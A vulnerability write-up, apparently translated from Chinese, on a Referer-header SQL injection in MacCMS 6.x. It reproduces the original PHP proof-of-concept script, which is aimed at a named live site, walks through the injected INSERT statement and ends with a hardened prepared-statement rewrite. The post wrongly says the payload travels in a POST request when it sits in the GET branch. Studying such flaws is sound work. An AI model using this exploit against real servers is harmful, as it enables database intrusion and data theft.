Learning from MacCMS 6.x: improper Referer handling leads to SQL injection

Source: http://www.wooyun.org/bugs/wooyun-2013-038804


code:

function Popularize()
{
	global $db;
	$userid = safeData("userid","get");
	if (!isNum($userid)) { die("用户非法,请从新登陆!");}
	$Ip = getip();
	$Ly = $_SERVER["HTTP_REFERER"];   // taken straight from the request header, no filtering at all
	$row = $db->getRow("select * from tbl_user where u_id=" . $userid .""); 
	
	if ($row){
		$sql="Select * From tbl_user_visit where uv_userid = " .$userid." and uv_ip ='".$Ip."' and STR_TO_DATE(uv_time,'%Y-%m-%d')='".date("Y-m-d")."'";
		$rsUv = $db->query($sql);
		$nums= $db -> num_rows($rsUv);
		if ($nums==0){
			// $Ly is spliced into the INSERT string by concatenation: this is the injection point
			$db->query("insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('".$userid."','".$Ip."','".$Ly."','".date('Y-m-d H:i:s',time())."') ");
			$db->query("update tbl_user set u_popularizenum=u_popularizenum+1,u_points=u_points+".app_userpopularize." where u_id = ". $userid );
			$sql="Delete From tbl_user_visit where STR_TO_DATE(uv_time,'%Y-%m-%d')<'".date("Y-m-d")."'";
			$db->query($sql);
		}
	}
	die("<sc" . "ript type=\"text/javascript\">location.href='" .getIndexLink() ."';</sc" . "ript>");
}

This one is easy to follow: $Ly = $_SERVER["HTTP_REFERER"]; reads the Referer header without any filtering, and the value is then concatenated straight into the SQL, which leads to injection.


Now look at the author's PoC:

<?php
// uc_fopen() is a raw-socket HTTP client; the only change from the usual helper is the
// hand-built Referer header in the GET branch, which carries the injected SQL.
function uc_fopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE,$inject) {
$return = '';
$matches = parse_url($url);
!isset($matches['host']) && $matches['host'] = '';
!isset($matches['path']) && $matches['path'] = '';
!isset($matches['query']) && $matches['query'] = '';
!isset($matches['port']) && $matches['port'] = '';
$host = $matches['host'];
$path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/';
$port = !empty($matches['port']) ? $matches['port'] : 80;
if($post) {
   $out = "POST $path HTTP/1.0\r\n";
   $out .= "Accept: */*\r\n";
   //$out .= "Referer: $boardurl\r\n";
   $out .= "Accept-Language: zh-cn\r\n";
   $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Connection: Close\r\n";
   $out .= "Cookie: $cookie\r\n\r\n";
}else {
   $out = "GET $path HTTP/1.0\r\n";
   $out .= "Accept: */*\r\n";
   // the payload: closes the uv_ly string literal, adds a subquery, and comments out the rest
   $out .= "Referer: a',(select now()) and ".$inject.")#\r\n";
   $out .= "Accept-Language: zh-cn\r\n";
   $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Connection: Close\r\n";
   $out .= "Cookie: $cookie\r\n\r\n";
}

$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
if(!$fp) {
   return '';//note $errstr : $errno \r\n
} else {
   stream_set_blocking($fp, $block);
   stream_set_timeout($fp, $timeout);
   @fwrite($fp, $out);
   $status = stream_get_meta_data($fp);
   if(!$status['timed_out']) {
    // skip the response headers
    while (!feof($fp)) {
     if(($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) {
      break;
     }
    }

    // read the body, honouring $limit if one was given
    $stop = false;
    while(!feof($fp) && !$stop) {
     $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
     $return .= $data;
     if($limit) {
      $limit -= strlen($data);
      $stop = $limit <= 0;
     }
    }
   }
   @fclose($fp);
   return $return;
}
}

uc_fopen('http://www.391.net/user/service.php?action=popularize&userid=597',0,0,0,FALSE,'',15,true,$_GET["a"]);
echo 'hi';
?>

Put this PHP code on a local server, and first let's look at what it does.

Since it is sent as POST, we only look at the POST branch. It first builds an HTTP request by hand, then sends it with fsockopen.

Look at the Referer the author constructs:

 $out .= "Referer: a',(select now()) and ".$inject.")#\r\n";

$inject is passed in from $_GET["a"]; suppose $_GET["a"] is 2.

Then the actual Referer is: Referer: a',(select now()) and 2)#\r\n

Substitute it into the injected statement.

The injection happens in this statement:

$db->query("insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('".$userid."','".$Ip."','".$Ly."','".date('Y-m-d H:i:s',time())."') ");

Normally the SQL statement that gets executed is:

insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('  1 ','0.0.0.0','a','2011-11-11 1:1:1')

After injection the statement becomes:

insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('  1 ','0.0.0.0','a',(select now()) and 2)#\r\n','2011-11-11 1:1:1')

The # comments out the rest of the SQL, so what actually runs is:

insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('  1 ','0.0.0.0','a',(select now()) and 2)

The number 2 is the injectable part.
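As an added example (not MacCMS code, and not from the WooYun report), this is how the visit-logging part of Popularize() looks when every request-derived value, the Referer included, is bound as a parameter through PDO prepared statements instead of being concatenated; the function name, the $pdo connection and the $points argument are assumptions, the table and column names are the ones shown above.

```php
<?php
// Hardened rewrite of the visit-logging step (example code, not MacCMS's own).
// Assumes $pdo is a PDO connection with PDO::ATTR_EMULATE_PREPARES set to false,
// so placeholders are real server-side parameters rather than client-side escaping.
function logPopularizeVisit(PDO $pdo, string $userid, string $ip, string $referer, int $points): bool
{
    // Reject anything but a plain integer id before touching the database (same intent as isNum()).
    if (!ctype_digit($userid)) {
        return false;
    }
    // The Referer is fully attacker-controlled: it is stored, never interpreted.
    // Truncating it also keeps an oversized header from failing the INSERT.
    $referer = mb_substr($referer, 0, 255);
    $today   = date('Y-m-d');

    // Same "one visit per IP per day" check as the original, with bound values.
    $stmt = $pdo->prepare(
        "SELECT COUNT(*) FROM tbl_user_visit
          WHERE uv_userid = :uid AND uv_ip = :ip
            AND STR_TO_DATE(uv_time, '%Y-%m-%d') = :today"
    );
    $stmt->execute([':uid' => (int) $userid, ':ip' => $ip, ':today' => $today]);
    if ((int) $stmt->fetchColumn() > 0) {
        return false; // already counted today
    }

    // The INSERT that was injectable: a Referer of  a',(select now()) and 2)#
    // now lands in uv_ly as that literal text, and the statement shape cannot change.
    $stmt = $pdo->prepare(
        "INSERT INTO tbl_user_visit (uv_userid, uv_ip, uv_ly, uv_time)
         VALUES (:uid, :ip, :ly, :now)"
    );
    $stmt->execute([
        ':uid' => (int) $userid,
        ':ip'  => $ip,
        ':ly'  => $referer,
        ':now' => date('Y-m-d H:i:s'),
    ]);

    // Points update with the user id and increment bound rather than spliced in.
    $stmt = $pdo->prepare(
        "UPDATE tbl_user
            SET u_popularizenum = u_popularizenum + 1, u_points = u_points + :pts
          WHERE u_id = :uid"
    );
    $stmt->execute([':pts' => $points, ':uid' => (int) $userid]);
    return true;
}
```

The same pattern applies to the getRow() lookup and the daily DELETE in the original function, which concatenate $userid and the date in exactly the same way.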

The author hangs parameter a off the local PHP script and injects through it with GET.

In the end the information is extracted.

Extracting information from an INSERT injection is something I still need to study; for now I'll just leave the link (http://drops.wooyun.org/tips/2078).

Hungry, off to eat..
